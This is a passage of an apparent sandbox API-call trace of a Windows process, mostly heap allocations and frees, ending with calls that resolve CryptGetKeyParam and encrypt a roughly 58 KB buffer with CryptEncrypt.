(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0110.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0110.271] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0110.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0110.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0110.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0110.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0110.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0110.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0110.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0110.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0110.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0110.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0110.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0110.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0110.274] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0110.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0110.275] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e25e0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e25e0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0110.277] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.277] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.277] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0110.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0110.278] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.278] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.278] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca5c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.278] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xe295, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xe2a0) returned 1 [0110.279] CharLowerBuffW (in: lpsz="byte[58017]", cchLength=0xb | out: lpsz="byte[58017]") returned 0xb [0110.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.279] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e790*=0xe295, dwBufLen=0xe2a0 | out: pbData=0x499a008*, pdwDataLen=0x144e790*=0xe2a0) returned 1 [0110.324] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.324] 